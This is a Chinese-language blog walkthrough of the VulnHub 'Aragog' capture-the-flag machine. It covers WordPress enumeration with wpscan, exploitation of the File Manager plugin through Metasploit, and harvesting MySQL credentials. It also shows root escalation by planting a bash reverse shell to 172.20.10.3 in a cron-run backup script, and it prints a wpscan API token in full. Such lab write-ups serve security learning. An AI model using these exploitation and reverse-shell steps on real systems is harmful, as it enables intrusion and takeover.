目录
靶机下载:https://download.vulnhub.com/harrypotter/Aragog-1.0.2.ova
ps:描述:阿拉戈克是3盒哈利波特虑拟机系列的第一个虚拟机,你需要找到隐藏在机器内的2个魂器(总共8个魂器隐藏在哈利波特系列的3个虚拟机中),并最终打败伏地魔。
1.信息收集
arp-scan -l 靶机ip:192.168.29.146
nmap -sV -A -sS -p- -T4 192.168.29.146 进行端口服务扫描 开启80(http) 22(ssh)
老样子先查看80端口,发现页面只有一张图片
使用dirsearch 进行目录扫描
查看/blog/wp-login.php 发现是 WordPress框架
2.wpscan工具
使用wpscan工具这是一款专门用来探测wordpress站点漏洞的工具,还可以检测wordpress站点用的插件存在的漏洞 ,但是这款工具wpscan规定扫描漏洞时,需要带上token值,才能显示出漏洞详细信息。这个token只需要去他的官网注册一下再登录就可以拿到了,如果不带token值,不会显示漏洞信息
wpscan --api-token=blsnsog49N5d0UwAIYACcXs3fKbchB7JpbCgNutJRHA --url http://192.168.29.146/blog -e p --plugins-detection aggressive
发现有很多File Manager 漏洞,使用msf进行利用
3.msf漏洞利用
直接search File Manager wordpress 搜索相关模块 使用第一个
show options查看参数配置 RHOSTS:目标地址 TARGETURI: 网站地址 LHOST:主机地址
成功拿下网站权限,第一个魂器就在家目录的hagrid98目录下 base64解码一下就好
4.数据库查询
wordpress用户会在mysql数据库中存储信息,在/etc/wordpress里可以打开config-default.php
得到了MySQL账号和密码 登录前我们要先获得一个交互式shell
python3 -c 'import pty; pty.spawn("/bin/bash");'
然后在进行mysql登录 ,查看wp_users表,得到用户和密码 md5解码一下:password123
5.提权
登录ssh,发现权限较低
使用find / -name '*.sh' 查看一下敏感文件 /opt/.backup.sh比较可以
查看.backup.sh文件 命令大概意思是把上传的文件 拷贝到tmp这个目录下
这里就怀疑可能这个文件被加入到定时任务中被一直执行,所有我们在文件中写入反弹shell命令
bash -c 'bash -i >&/dev/tcp/172.20.10.3/6688 0>&1'
本地监听6688端口,不到一分钟就连接成功了,成功提权到root
进入root目录下查看flag
总结:
1.信息收集arp-scan -l 获取ip地址 和端口信息 web扫描工具:dirbuste
2.数据库的基本操作 查询语句 select * from python3开启交互
3.wpscan工具的使用 探测WordPress 框架
4.MSF框架:exploit/multi/http/wp_file_manager_rce的使用
---------------------------------------------------------------------------------------------------------------
后言:刚入门网安的一只小白,想把自学的学习的过程记录下来方便自己,帮助他人。可以私信博主欢迎学习交流!!!